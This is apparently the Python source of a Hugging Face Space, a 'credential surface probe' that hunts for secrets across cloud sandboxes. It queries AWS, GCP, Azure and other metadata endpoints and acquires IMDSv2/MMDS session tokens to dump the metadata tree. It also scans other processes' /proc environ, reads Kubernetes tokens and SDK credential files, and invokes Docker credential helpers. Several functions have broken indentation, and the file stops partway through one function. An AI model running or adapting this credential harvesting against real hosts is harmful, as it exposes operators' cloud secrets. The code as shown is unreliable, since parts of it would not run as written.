# imds-test / app.py — Hugging Face Space page header, kept as comments so the
# file parses as Python (was raw scraped text: uploader "vanilla-tiramisu",
# commit "Update app.py", 973aa1b verified).
"""
Cloud Sandbox Credential Surface Probe v2
==========================================
Enumerates 9 credential storage/delivery channels in cloud sandbox environments,
applies extraction techniques, and produces an actionable channel-mapped report.
Credential Channels:
1. IMDS / MMDS (network endpoint)
2. ECS Container Endpoint (network endpoint)
3. IRSA / WI Projected Volume (file)
4. K8s Service Account Token (file, pivot)
5. SDK Configuration Files (file)
6. Hardcoded ENV Injection (environment variable)
7. Credential Helper (helper binary)
8. Sidecar / Reverse Proxy (out-of-sandbox)
9. UDS Proxy (socket)
Extraction Techniques (orthogonal to channels):
- Direct access (curl / cat / env / helper invoke)
- Process environ scanning (/proc/*/environ)
- Docker socket interaction (container inspect)
- MMDS full dump with token acquisition
"""
import gradio as gr
import argparse
import json
import os
import platform
import re
import shutil
import socket
import stat as statmod
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
# Tuning knobs for probe timeouts and report truncation.
DEFAULT_TIMEOUT = 2.5       # seconds per HTTP probe
PREVIEW_BYTES = 160         # default byte cap for file/body previews
ENV_KEY_LIMIT = 60          # max interesting env keys reported
LISTING_LIMIT = 30          # max directory entries sampled per listing
SOCKET_PATH_LIMIT = 50      # max Unix socket paths collected
PROC_SAMPLE_LIMIT = 40      # max /proc/<pid> entries scanned
# Fingerprints used to recognise the Firecracker MMDS token gate: a 401 whose
# body mentions the token header and whose Server header names Firecracker.
MMDS_TOKEN_HINT = "x-metadata-token"
FIRECRACKER_SERVER_HINT = "firecracker api"
# Base address an ECS *relative* credential URI is resolved against.
ECS_RELATIVE_URI_BASE = "http://169.254.170.2"
# Response headers that are safe/useful to copy into the report.
HEADER_ALLOWLIST = {
    "server", "content-type", "content-length", "metadata-flavor",
    "www-authenticate", "x-aws-ec2-metadata-token-ttl-seconds",
    "x-ms-version", "date",
}
# Metadata endpoint probes (channel 1 raw reachability)
PROBES = [
    {"provider": "aws", "name": "aws_root",
     "url": "http://169.254.169.254/", "headers": {}},
    {"provider": "aws", "name": "aws_meta_root",
     "url": "http://169.254.169.254/latest/meta-data/", "headers": {}},
    {"provider": "aws", "name": "aws_dynamic_identity",
     "url": "http://169.254.169.254/latest/dynamic/instance-identity/document",
     "headers": {}},
    {"provider": "firecracker", "name": "firecracker_mmds_ssh_keys",
     "url": "http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/",
     "headers": {}},
    {"provider": "gcp", "name": "gcp_meta_no_header",
     "url": "http://metadata.google.internal/computeMetadata/v1/",
     "headers": {}},
    {"provider": "gcp", "name": "gcp_meta_with_header",
     "url": "http://metadata.google.internal/computeMetadata/v1/",
     "headers": {"Metadata-Flavor": "Google"}},
    {"provider": "azure", "name": "azure_meta_no_header",
     "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
     "headers": {}},
    {"provider": "azure", "name": "azure_meta_with_header",
     "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
     "headers": {"Metadata": "true"}},
    {"provider": "aliyun", "name": "aliyun_meta_root",
     "url": "http://100.100.100.200/latest/meta-data/", "headers": {}},
    {"provider": "digitalocean", "name": "digitalocean_meta_root",
     "url": "http://169.254.169.254/metadata/v1/", "headers": {}},
    {"provider": "oci", "name": "oci_meta_no_header",
     "url": "http://169.254.169.254/opc/v2/", "headers": {}},
    {"provider": "oci", "name": "oci_meta_with_header",
     "url": "http://169.254.169.254/opc/v2/",
     "headers": {"Authorization": "Bearer Oracle"}},
]
# MMDS / IMDSv2 token acquisition attempts
MMDS_TOKEN_PROBES = [
    {"name": "imdsv2_put_token", "method": "PUT",
     "url": "http://169.254.169.254/latest/api/token",
     "headers": {"X-metadata-token-ttl-seconds": "21600"}},
    {"name": "mmds_put_token", "method": "PUT",
     "url": "http://169.254.169.254/latest/meta-data/mmds/token",
     "headers": {"X-metadata-token-ttl-seconds": "300"}},
]
# Env patterns for interesting key detection (substring match on upper-cased key)
INTERESTING_ENV_PATTERNS = [
    "AWS_", "AZURE_", "GCP", "GOOGLE_", "KUBERNETES", "KUBE_",
    "ECS", "EC2", "CONTAINER", "DOCKER", "POD", "CI",
    "GITHUB_", "GITLAB_", "CODESPACES", "DEVCONTAINER",
    "FIRECRACKER", "MMDS",
    "CSB", "CODESANDBOX", "PITCHER", "SANDBOX",
    "RAILWAY", "FLY_", "RENDER_", "REPLIT_", "GITPOD_",
    "TOKEN", "SECRET", "KEY", "CRED", "AUTH", "PASS",
]
# Regex for sensitive values in /proc/*/environ: AKIA-style access key ids,
# secret-ish keywords, or base64url values starting "eyJ" (JWT-looking).
SENSITIVE_ENVIRON_RE = re.compile(
    r'(AKIA[0-9A-Z]{16}'
    r'|(?:SECRET|TOKEN|KEY|PASS|CRED|AUTH|MMDS|PITCHER|CSB|CODESANDBOX|SANDBOX)'
    r'|(?:eyJ[A-Za-z0-9_-]{10,})'
    r')',
    re.IGNORECASE,
)
# Env vars pointing at the ECS container credential endpoint.
ECS_ENV_KEYS = [
    "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",
    "AWS_CONTAINER_CREDENTIALS_FULL_URI",
]
# Well-known on-disk SDK credential/config locations (expanduser'd later).
SDK_PATHS = [
    "~/.aws/credentials", "~/.aws/config",
    "~/.config/gcloud/application_default_credentials.json",
    "~/.config/gcloud/access_tokens.db",
    "~/.azure",
]
# Files previewed to fingerprint the runtime (cgroups, DMI strings, hypervisor).
FILE_PREVIEW_PATHS = [
    "/proc/1/cgroup", "/proc/self/cgroup", "/proc/1/cmdline",
    "/etc/hostname", "/etc/resolv.conf",
    "/sys/class/dmi/id/product_name", "/sys/class/dmi/id/product_version",
    "/sys/class/dmi/id/sys_vendor", "/sys/class/dmi/id/board_vendor",
    "/sys/hypervisor/uuid",
]
# Marker files stat'ed (not read) for container / cloud-init / K8s presence.
FILE_STAT_PATHS = [
    "/.dockerenv", "/run/.containerenv",
    "/var/lib/cloud/instance/cloud-config.txt", "/etc/cloud/cloud.cfg",
    "/var/run/secrets/kubernetes.io/serviceaccount/token",
    "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
]
# Directories sampled for general context.
DIRECTORY_LIST_PATHS = ["/var/lib/cloud", "/var/run/secrets", "/run", "/tmp"]
# Podman / crun / libpod runtime artifact roots.
PODMAN_ARTIFACT_PATHS = ["/run/containers", "/run/libpod", "/run/crun"]
# ---------------------------------------------------------------------------
# Utility helpers
# ---------------------------------------------------------------------------
def normalize_path(path):
    """Translate an absolute POSIX path to Windows separators on NT.

    Relative paths, and all paths on non-Windows platforms, come back
    unchanged.
    """
    on_windows = os.name == "nt"
    if on_windows and path.startswith("/"):
        return path.replace("/", "\\")
    return path
def sanitize_preview(text, limit=PREVIEW_BYTES):
    """Flatten *text* into a single-spaced line capped at *limit* chars."""
    flattened = text.replace("\r", " ")
    return re.sub(r"\s+", " ", flattened)[:limit]
def redact_value(value, keep=12):
    """Keep the first *keep* characters; longer values get a length suffix."""
    if len(value) <= keep:
        return value
    return f"{value[:keep]}...({len(value)} chars)"
def filter_headers(headers):
    """Drop every header whose (case-insensitive) name is not allow-listed."""
    allowed = {}
    for name, value in headers.items():
        if name.lower() in HEADER_ALLOWLIST:
            allowed[name] = value
    return allowed
def get_header_value(headers, key):
    """Case-insensitive header lookup; returns None when the key is absent."""
    wanted = key.lower()
    for name, value in headers.items():
        if name.lower() == wanted:
            return value
    return None
# ---------------------------------------------------------------------------
# Low-level I/O
# ---------------------------------------------------------------------------
def stat_path(path):
    """Stat *path* and report existence, size, dir-ness and readability.

    Readability is proven by actually opening the file for reading (so
    permission/ACL effects are observed); directories, which fail the
    open, count as readable when the earlier stat showed a directory.
    """
    target = normalize_path(path)
    info = {"path": path, "exists": False, "readable": False}
    try:
        st = os.stat(target)
        info["exists"] = True
        info["size"] = st.st_size
        info["is_dir"] = os.path.isdir(target)
    except Exception as exc:
        info["error"] = f"{type(exc).__name__}: {exc}"
        return info  # stat failed -> nothing more to learn
    try:
        with open(target, "rb"):
            info["readable"] = True
    except Exception:
        # open() on a directory raises (e.g. IsADirectoryError); treat a
        # listable directory as "readable" for reporting purposes.
        if info.get("is_dir"):
            info["readable"] = True
    return info
def read_preview(path, limit=PREVIEW_BYTES):
    """Read up to *limit* bytes of *path*; return a sanitized preview dict.

    Keys: path, exists, readable, and either "preview" on success or
    "error" with the exception name on failure.
    """
    target = normalize_path(path)
    result = {"path": path, "exists": False, "readable": False}
    try:
        with open(target, "rb") as fh:
            result["exists"] = True
            result["readable"] = True
            body = fh.read(limit).decode("utf-8", errors="replace")
            result["preview"] = sanitize_preview(body, limit)
    except FileNotFoundError:
        result["error"] = "FileNotFoundError"
    except Exception as exc:
        # Path may exist but be unreadable (EACCES, IsADirectoryError, ...).
        result["exists"] = os.path.exists(target)
        result["error"] = f"{type(exc).__name__}: {exc}"
    return result
def read_full(path, limit=65536):
    """Read file fully up to *limit* bytes, return raw bytes or None."""
    try:
        with open(normalize_path(path), "rb") as fh:
            return fh.read(limit)
    except Exception:
        # Best-effort reader: any failure (missing, perms, dir) yields None.
        return None
def list_directory(path, limit=LISTING_LIMIT):
    """List a directory, truncating the reported entry sample to *limit*."""
    result = {"path": path, "exists": False, "readable": False}
    target = normalize_path(path)
    try:
        names = sorted(os.listdir(target))
    except FileNotFoundError:
        result["error"] = "FileNotFoundError"
    except Exception as exc:
        # e.g. permission denied on a directory that does exist.
        result["exists"] = os.path.exists(target)
        result["error"] = f"{type(exc).__name__}: {exc}"
    else:
        result["exists"] = True
        result["readable"] = True
        result["entries"] = names[:limit]
        result["entry_count"] = len(names)
    return result
def find_socket_files(limit=SOCKET_PATH_LIMIT):
    """Walk common runtime directories collecting Unix-socket paths.

    Returns at most *limit* paths; on Windows returns an empty list.
    """
    if os.name == "nt":
        return []
    findings = []
    for root in ["/run", "/var/run", "/tmp", "/project", "/workspace"]:
        target = normalize_path(root)
        if not os.path.isdir(target):
            continue
        for cr, _, files in os.walk(target):
            for fn in files:
                fp = os.path.join(cr, fn)
                try:
                    # S_ISSOCK on the stat mode identifies socket inodes.
                    if statmod.S_ISSOCK(os.stat(fp).st_mode):
                        findings.append(fp)
                        if len(findings) >= limit:
                            return findings  # early exit once capped
                except Exception:
                    continue  # racing deletions / permission errors expected
    return findings
# ---------------------------------------------------------------------------
# HTTP helpers
# ---------------------------------------------------------------------------
def http_get(url, headers=None, timeout=DEFAULT_TIMEOUT, method="GET",
             data=None, read_limit=PREVIEW_BYTES):
    """Generic HTTP request, returns dict with status/body/headers/error.

    Outcome shapes:
      * success        -> {"status", "ok": True, "latency_ms", "headers", "body"}
      * HTTP error     -> same keys plus "error"; "body" may be None
      * transport fail -> {"status": None, "ok": False, "latency_ms", "error"}
    Returned headers are filtered through HEADER_ALLOWLIST.
    """
    hdrs = headers or {}
    started = time.time()
    req = urllib.request.Request(url, headers=hdrs, method=method, data=data)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(read_limit).decode("utf-8", errors="replace")
            return {
                "status": resp.status, "ok": True,
                "latency_ms": round((time.time() - started) * 1000, 2),
                "headers": filter_headers(resp.headers),
                "body": body,
            }
    except urllib.error.HTTPError as exc:
        # Non-2xx responses still carry useful headers/body (e.g. 401 hints).
        preview = None
        try:
            preview = exc.read(read_limit).decode("utf-8", errors="replace")
        except Exception:
            pass
        return {
            "status": exc.code, "ok": False,
            "latency_ms": round((time.time() - started) * 1000, 2),
            "headers": filter_headers(exc.headers),
            "error": str(exc.reason), "body": preview,
        }
    except urllib.error.URLError as exc:
        # Collapse wrapped socket timeouts into the stable "timeout" marker.
        reason = exc.reason
        msg = "timeout" if isinstance(reason, socket.timeout) else f"{type(reason).__name__}: {reason}"
        return {"status": None, "ok": False,
                "latency_ms": round((time.time() - started) * 1000, 2),
                "error": msg}
    except socket.timeout:
        return {"status": None, "ok": False,
                "latency_ms": round((time.time() - started) * 1000, 2),
                "error": "timeout"}
    except Exception as exc:
        # Catch-all keeps the probe loop alive on unexpected failures.
        return {"status": None, "ok": False,
                "latency_ms": round((time.time() - started) * 1000, 2),
                "error": f"{type(exc).__name__}: {exc}"}
def uds_http_get(socket_path, http_path, timeout=5, recv_limit=65536):
    """HTTP/1.0 GET over a Unix Domain Socket. Returns response body string.

    Reads until EOF, then strips the header block at the first blank line.
    Raises on connect/send/recv failure (callers wrap in try/except).
    """
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.settimeout(timeout)
        s.connect(socket_path)
        req = f"GET {http_path} HTTP/1.0\r\nHost: localhost\r\n\r\n"
        s.sendall(req.encode())
        chunks = []
        while True:
            chunk = s.recv(recv_limit)
            if not chunk:
                break
            chunks.append(chunk)
    finally:
        # Fix: the socket previously leaked when connect/sendall/recv raised.
        s.close()
    raw = b"".join(chunks).decode("utf-8", errors="replace")
    if "\r\n\r\n" in raw:
        _, body = raw.split("\r\n\r\n", 1)
        return body
    return raw
def uds_send_json(socket_path, payload, timeout=3, recv_limit=4096):
    """Send newline-terminated JSON over a Unix Domain Socket, return response.

    Performs a single recv of up to *recv_limit* bytes. Raises on failure
    (callers wrap in try/except).
    """
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.settimeout(timeout)
        s.connect(socket_path)
        s.sendall((json.dumps(payload) + "\n").encode())
        resp = s.recv(recv_limit).decode("utf-8", errors="replace")
    finally:
        # Fix: the socket previously leaked when connect/sendall/recv raised.
        s.close()
    return resp
# ---------------------------------------------------------------------------
# Runtime fingerprinting
# ---------------------------------------------------------------------------
def get_runtime():
    """Snapshot of the current process/interpreter for the report header."""
    uid = os.getuid() if hasattr(os, "getuid") else None  # absent on Windows
    return {
        "hostname": socket.gethostname(),
        "platform": platform.platform(),
        "python_version": platform.python_version(),
        "pid": os.getpid(),
        "uid": uid,
        "cwd": os.getcwd(),
        "argv": sys.argv,
        "env_key_count": len(os.environ),
    }
def collect_runtime_context():
    """Filesystem / cgroup / marker fingerprints to characterise the sandbox."""
    context = {}
    context["file_previews"] = [read_preview(p) for p in FILE_PREVIEW_PATHS]
    context["file_stats"] = [stat_path(p) for p in FILE_STAT_PATHS]
    context["directory_samples"] = [list_directory(p) for p in DIRECTORY_LIST_PATHS]
    context["interesting_env_keys"] = _collect_env_keys()
    return context
def _collect_env_keys():
    """Sorted env-var names matching any interesting pattern, capped."""
    hits = [
        name for name in sorted(os.environ)
        if any(pat in name.upper() for pat in INTERESTING_ENV_PATTERNS)
    ]
    return hits[:ENV_KEY_LIMIT]
# ---------------------------------------------------------------------------
# Channel 1 – IMDS / MMDS
# ---------------------------------------------------------------------------
def _is_firecracker_gated(item):
if item.get("status") != 401:
return False
srv = get_header_value(item.get("headers", {}), "server") or ""
body = (item.get("body") or item.get("preview") or "").lower()
return FIRECRACKER_SERVER_HINT in srv.lower() and MMDS_TOKEN_HINT in body
def probe_metadata_endpoints(timeout):
    """Fire every channel-1 probe; annotate each outcome with its probe info."""
    annotated = []
    for probe in PROBES:
        outcome = http_get(probe["url"], headers=probe["headers"],
                           timeout=timeout, read_limit=PREVIEW_BYTES)
        outcome["provider"] = probe["provider"]
        outcome["name"] = probe["name"]
        outcome["url"] = probe["url"]
        annotated.append(outcome)
    return annotated
def try_acquire_mmds_token(timeout):
    """Attempt IMDSv2 PUT and variants to obtain a session token.

    Returns one summary entry per probe; a successful non-empty body adds
    token_length/token_preview fields.
    """
    results = []
    for tp in MMDS_TOKEN_PROBES:
        r = http_get(tp["url"], headers=tp["headers"], method=tp["method"],
                     data=b"", timeout=timeout, read_limit=256)
        entry = {
            "name": tp["name"],
            "status": r.get("status"),
            "ok": r.get("ok", False),
            "latency_ms": r.get("latency_ms"),
        }
        if r.get("ok") and r.get("body"):
            token = r["body"].strip()
            entry["token_length"] = len(token)
            # NOTE(review): despite the name, this stores the whole stripped
            # body (already capped at 256 bytes by read_limit above).
            entry["token_preview"] = token
        if r.get("error"):
            entry["error"] = r["error"]
        results.append(entry)
    return results
def dump_mmds_full(token, timeout=5):
    """Fetch the entire MMDS tree and decode additional_files byte arrays.

    Returns token_ok/raw_size always; when the body parses as JSON it adds a
    redacted key inventory and redacted decoded file contents, otherwise a
    sanitized raw preview.
    """
    result = {"token_ok": False, "raw_size": 0}
    r = http_get("http://169.254.169.254/",
                 headers={"X-metadata-token": token,
                          "Accept": "application/json"},
                 timeout=timeout, read_limit=262144)  # 256 KB
    if not r.get("ok"):
        result["error"] = r.get("error", f"status={r.get('status')}")
        return result
    body = r.get("body", "")
    result["token_ok"] = True
    result["raw_size"] = len(body)
    try:
        tree = json.loads(body)
    except json.JSONDecodeError:
        # Non-JSON response: keep a sanitized preview instead of an inventory.
        result["tree_raw_preview"] = sanitize_preview(body, 2048)
        return result
    # Walk the tree and collect all leaf keys (redacted values)
    key_inventory = []
    _walk_keys(tree, "", key_inventory, depth=0)
    result["key_inventory"] = key_inventory
    # Decode additional_files byte arrays
    decoded_files = {}
    try:
        additional = tree.get("latest", {}).get("additional_files", {})
        if not additional:
            # Try other common structures
            for top_key in tree:
                sub = tree[top_key]
                if isinstance(sub, dict) and "additional_files" in sub:
                    additional = sub["additional_files"]
                    break
        for fpath, fobj in additional.items():
            # A file may be a raw byte list or a {"content": [...]} wrapper.
            content = fobj if isinstance(fobj, list) else fobj.get("content", []) if isinstance(fobj, dict) else []
            if isinstance(content, list):
                raw_text = bytes(content).decode("utf-8", errors="replace")
                lines = raw_text.split("\n")
                redacted = []
                for line in lines:
                    if "=" in line:
                        # KEY=VALUE lines: keep the key, redact the value.
                        k, _, v = line.partition("=")
                        redacted.append(f"{k}={redact_value(v, 16)}")
                    elif line.strip():
                        redacted.append(redact_value(line, 40))
                decoded_files[fpath] = {
                    "line_count": len(lines),
                    "raw_length": len(raw_text),
                    "content_redacted": "\n".join(redacted),
                }
    except Exception as exc:
        # Keep partial results; record the failure under a reserved key.
        decoded_files["_error"] = f"{type(exc).__name__}: {exc}"
    result["decoded_files"] = decoded_files
    return result
def _walk_keys(obj, prefix, acc, depth=0, max_depth=6):
if depth > max_depth:
return
if isinstance(obj, dict):
for k, v in obj.items():
full = f"{prefix}/{k}" if prefix else k
if isinstance(v, (dict, list)):
_walk_keys(v, full, acc, depth + 1, max_depth)
else:
val_str = str(v)
acc.append({"key": full, "type": type(v).__name__,
"value_preview": redact_value(val_str, 20)})
elif isinstance(obj, list) and len(obj) < 200:
acc.append({"key": prefix, "type": "list",
"value_preview": f"[{len(obj)} items]"})
def collect_channel_1(timeout):
    """Channel 1: IMDS / MMDS – probe, acquire token, dump.

    Returns a dict with a coarse ``status`` plus all raw evidence
    (probe results, token attempts, optional MMDS dump) used by the
    assessment stage.
    """
    probes = probe_metadata_endpoints(timeout)
    token_attempts = try_acquire_mmds_token(timeout)
    mmds_dump = None
    acquired_token = None
    for t in token_attempts:
        if t.get("ok") and t.get("token_length", 0) > 0:
            # Attempt entries only carry a preview, so re-issue the primary
            # PUT to obtain the complete token value.
            r = http_get(MMDS_TOKEN_PROBES[0]["url"],
                         headers=MMDS_TOKEN_PROBES[0]["headers"],
                         method="PUT", data=b"", timeout=timeout,
                         read_limit=512)
            if r.get("ok"):
                acquired_token = r["body"].strip()
                break
    if acquired_token:
        mmds_dump = dump_mmds_full(acquired_token, timeout=max(timeout, 5))
    # Classify probes (fix: dropped the unused `gated` bucket that was
    # declared but never populated).
    reachable, mmds_gated, blocked = [], [], []
    for item in probes:
        if item.get("status") == 200:
            reachable.append(item["name"])
        elif _is_firecracker_gated(item):
            mmds_gated.append(item["name"])
        else:
            blocked.append(item["name"])
    # "open" is only reachable if PROBES were empty; kept as a safe fallback.
    status = "open"
    if reachable:
        status = "directly_reachable"
    elif acquired_token and mmds_dump and mmds_dump.get("token_ok"):
        status = "token_gate_bypassed"
    elif mmds_gated:
        status = "token_gated"
    elif blocked:
        status = "blocked"
    return {
        "status": status,
        "probes": probes,
        "token_attempts": token_attempts,
        "mmds_dump": mmds_dump,
        "directly_reachable": reachable,
        "mmds_token_gated": mmds_gated,
        "blocked": blocked,
    }
# ---------------------------------------------------------------------------
# Channel 2 – ECS Container Credential Endpoint
# ---------------------------------------------------------------------------
def collect_channel_2(timeout):
    """Channel 2: ECS container credential endpoint located via env pointers."""
    entries = []
    for key in ECS_ENV_KEYS:
        val = os.environ.get(key)
        if not val:
            continue
        # Relative URIs resolve against the fixed ECS agent address.
        if key.endswith("RELATIVE_URI"):
            url = f"{ECS_RELATIVE_URI_BASE}{val}"
        else:
            url = val
        resp = http_get(url, timeout=timeout, read_limit=512)
        body = resp.get("body")
        entries.append({
            "env_key": key,
            "url_redacted": redact_value(url, 30),
            "status": resp.get("status"),
            "ok": resp.get("ok", False),
            "body_preview": redact_value(body, 40) if body else None,
            "error": resp.get("error"),
        })
    if any(e["ok"] for e in entries):
        status = "detected"
    elif entries:
        status = "env_present"
    else:
        status = "not_found"
    return {"status": status, "entries": entries}
# ---------------------------------------------------------------------------
# Channel 3 – IRSA / Workload Identity projected volumes
# ---------------------------------------------------------------------------
def collect_channel_3():
    """Channel 3: IRSA / workload-identity files pointed to by env vars."""
    pointers = []
    for env_key in ("AWS_WEB_IDENTITY_TOKEN_FILE",
                    "GOOGLE_APPLICATION_CREDENTIALS",
                    "AZURE_CLIENT_CERTIFICATE_PATH"):
        val = os.environ.get(env_key)
        if not val:
            continue
        info = stat_path(val)
        entry = {"env_key": env_key, "path": val, **info}
        if info.get("readable"):
            preview = read_preview(val, limit=240)
            entry["content_preview"] = redact_value(
                preview.get("preview", ""), 40)
            # Two dots is the cheap JWT shape check (header.payload.signature).
            entry["jwt_like"] = preview.get("preview", "").count(".") >= 2
        pointers.append(entry)
    return {
        "status": "detected" if pointers else "not_found",
        "pointers": pointers,
    }
# ---------------------------------------------------------------------------
# Channel 4 – Kubernetes Service Account Token
# ---------------------------------------------------------------------------
def collect_channel_4():
    """Channel 4: Kubernetes service-account token mounted into the pod."""
    token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
    ns_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
    token_info = stat_path(token_path)
    result = {"status": "not_found", "token": token_info}
    if token_info.get("exists") and token_info.get("readable"):
        preview = read_preview(token_path, limit=300)
        raw = preview.get("preview", "")
        result["status"] = "detected"
        # Two dots is the cheap JWT shape check (header.payload.signature).
        result["jwt_like"] = raw.count(".") >= 2
        result["content_preview"] = redact_value(raw, 30)
        ns_info = read_preview(ns_path, limit=100)
        if ns_info.get("readable"):
            result["namespace"] = ns_info.get("preview", "").strip()
    return result
# ---------------------------------------------------------------------------
# Channel 5 – SDK configuration files
# ---------------------------------------------------------------------------
def collect_channel_5():
    """Channel 5: on-disk SDK configuration files (AWS / gcloud / azure)."""
    found = []
    for raw_path in SDK_PATHS:
        expanded = os.path.expanduser(raw_path)
        info = stat_path(expanded)
        if info.get("exists"):
            entry = {"path": expanded, **info}
            if info.get("readable") and not info.get("is_dir"):
                p = read_preview(expanded, limit=512)
                entry["content_preview"] = redact_value(
                    p.get("preview", ""), 60)
            found.append(entry)
    # Also try /home/*/.aws etc
    # NOTE(review): os.path.join(home_base, sub) yields "/home/.aws/...",
    # not a per-user "/home/<user>/.aws/..." expansion — confirm whether a
    # glob over user home directories was intended here.
    for home_base in ["/home", "/root"]:
        for sub in [".aws/credentials", ".aws/config",
                    ".config/gcloud/application_default_credentials.json"]:
            candidate = os.path.join(home_base, sub)
            if candidate == os.path.expanduser(f"~/{sub}"):
                continue  # skip duplicates of the expanduser pass above
            info = stat_path(candidate)
            if info.get("exists"):
                found.append({"path": candidate, **info})
    return {
        "status": "detected" if found else "not_found",
        "files": found,
    }
# ---------------------------------------------------------------------------
# Channel 6 – Hardcoded ENV injection
# ---------------------------------------------------------------------------
def collect_channel_6():
    """Scan current process env AND /proc/*/environ for sensitive vars."""
    # Current process: substring match on upper-cased key names.
    current_env = []
    for key in sorted(os.environ):
        upper = key.upper()
        if any(pat in upper for pat in INTERESTING_ENV_PATTERNS):
            current_env.append({
                "key": key,
                "value_preview": redact_value(os.environ[key], 16),
                "value_length": len(os.environ[key]),
            })
    # Cross-process scan
    cross_process = _scan_proc_environ()
    return {
        "status": "detected" if (current_env or cross_process["findings"]) else "not_found",
        "current_process_interesting_count": len(current_env),
        "current_process": current_env[:ENV_KEY_LIMIT],
        "cross_process": cross_process,
    }
def _scan_proc_environ():
    """Sample /proc/<pid>/environ across processes for sensitive-looking vars.

    Returns supported/pids_sampled/pids_readable counters plus redacted
    findings; each env key is reported once (first PID seen wins).
    """
    proc_root = normalize_path("/proc")
    if not os.path.isdir(proc_root):
        return {"supported": False, "findings": []}  # non-Linux or masked /proc
    findings = []
    seen_keys = set()      # dedupe across PIDs
    pids_sampled = 0
    pids_readable = 0
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue       # skip non-PID entries (self, sys, ...)
        if pids_sampled >= PROC_SAMPLE_LIMIT:
            break
        pids_sampled += 1  # counted even if the read below fails
        environ_path = os.path.join(proc_root, entry, "environ")
        try:
            with open(environ_path, "rb") as fh:
                raw = fh.read(16384)
            pids_readable += 1
        except Exception:
            continue       # typically EACCES for other users' processes
    # environ(5): contents are NUL-separated KEY=VALUE pairs.
        for pair in raw.split(b'\x00'):
            try:
                decoded = pair.decode("utf-8", errors="replace")
            except Exception:
                continue   # defensive; replace-mode decode should not raise
            if '=' not in decoded:
                continue
            key, _, value = decoded.partition('=')
            if key in seen_keys:
                continue
            if SENSITIVE_ENVIRON_RE.search(key) or SENSITIVE_ENVIRON_RE.search(value):
                seen_keys.add(key)
                findings.append({
                    "pid": entry, "key": key,
                    "value_preview": redact_value(value, 12),
                    "value_length": len(value),
                })
    return {
        "supported": True,
        "pids_sampled": pids_sampled,
        "pids_readable": pids_readable,
        "finding_count": len(findings),
        "findings": findings,
    }
# ---------------------------------------------------------------------------
# Channel 7 – Docker Credential Helper
# ---------------------------------------------------------------------------
def collect_channel_7():
    """Channel 7: Docker credential helpers configured or present in PATH."""
    # Search multiple possible config locations
    candidates = [
        os.path.expanduser("~/.docker/config.json"),
        "/root/.docker/config.json",
        "/home/*/.docker/config.json",  # glob pattern, expanded below
    ]
    config_found = None
    for c in candidates:
        if "*" in c:
            import glob
            for match in glob.glob(c):
                if os.path.isfile(match):
                    config_found = match
                    # NOTE(review): this break leaves only the glob loop; the
                    # outer candidate loop continues (harmless today because
                    # the glob entry is last in `candidates`).
                    break
        elif os.path.isfile(c):
            config_found = c
            break
    result = {"status": "not_found", "config_path": config_found, "helpers": []}
    if not config_found:
        return result
    try:
        with open(config_found, "r", encoding="utf-8") as fh:
            data = json.load(fh)
    except Exception as exc:
        result["error"] = f"{type(exc).__name__}: {exc}"
        return result
    # credsStore is the global helper; credHelpers maps registry -> helper.
    helper_names = []
    if isinstance(data.get("credsStore"), str):
        helper_names.append(data["credsStore"])
    cred_helpers = data.get("credHelpers", {})
    if isinstance(cred_helpers, dict):
        helper_names.extend(v for v in cred_helpers.values() if isinstance(v, str))
    for name in sorted(set(helper_names)):
        bin_name = f"docker-credential-{name}"
        found = bool(shutil.which(bin_name))
        entry = {"name": name, "binary": bin_name, "binary_found": found}
        # Try invoking list
        if found:
            entry["list_result"] = _try_helper_list(bin_name)
        result["helpers"].append(entry)
    # Also check for the binary even without config
    for bin_name in ["docker-credential-secret", "docker-credential-ecr-login",
                     "docker-credential-gcloud", "docker-credential-helper"]:
        if shutil.which(bin_name) and bin_name not in [h["binary"] for h in result["helpers"]]:
            entry = {"name": bin_name.replace("docker-credential-", ""),
                     "binary": bin_name, "binary_found": True,
                     "note": "found_in_PATH_without_config"}
            entry["list_result"] = _try_helper_list(bin_name)
            result["helpers"].append(entry)
    result["status"] = "detected" if result["helpers"] else "not_found"
    return result
def _try_helper_list(bin_name):
"""Try echo '' | docker-credential-xxx list"""
import subprocess
try:
proc = subprocess.run(
[bin_name, "list"],
input=b"", capture_output=True, timeout=5,
)
out = proc.stdout.decode("utf-8", errors="replace")[:512]
err = proc.stderr.decode("utf-8", errors="replace")[:256]
return {
"returncode": proc.returncode,
"stdout_preview": redact_value(out, 80),
"stderr_preview": redact_value(err, 80) if err else None,
}
except FileNotFoundError:
return {"error": "binary_not_found"}
except Exception as exc:
return {"error": f"{type(exc).__name__}: {exc}"}
# ---------------------------------------------------------------------------
# Channel 8 – Sidecar / Reverse Proxy (detection by absence)
# ---------------------------------------------------------------------------
def collect_channel_8():
    """Infer sidecar presence by checking for proxy env vars and iptables."""
    indicators = []
    for key in ("HTTP_PROXY", "HTTPS_PROXY", "http_proxy", "https_proxy",
                "NO_PROXY", "no_proxy"):
        val = os.environ.get(key)
        if val:
            indicators.append({"type": "proxy_env", "key": key,
                               "value_preview": redact_value(val, 30)})
    # Check if iptables has NAT rules redirecting outbound traffic
    import subprocess
    try:
        proc = subprocess.run(
            ["iptables", "-t", "nat", "-L", "-n"],
            capture_output=True, timeout=5,
        )
        out = proc.stdout.decode("utf-8", errors="replace")
        if "REDIRECT" in out or "DNAT" in out:
            indicators.append({"type": "iptables_redirect",
                               "preview": redact_value(out, 120)})
    except Exception:
        pass  # iptables missing or not permitted — treated as no indicator
    return {
        "status": "possible" if indicators else "not_observed",
        "indicators": indicators,
    }
# ---------------------------------------------------------------------------
# Channel 9 – UDS Proxy
# ---------------------------------------------------------------------------
def collect_channel_9(timeout):
    """Enumerate Unix domain sockets and probe high-value ones."""
    socket_files = find_socket_files()
    # Bucket the sockets by the tooling they appear to belong to.
    docker_socks = [p for p in socket_files if "docker.sock" in p]
    pitcher_socks = [p for p in socket_files if "pitcher" in p]
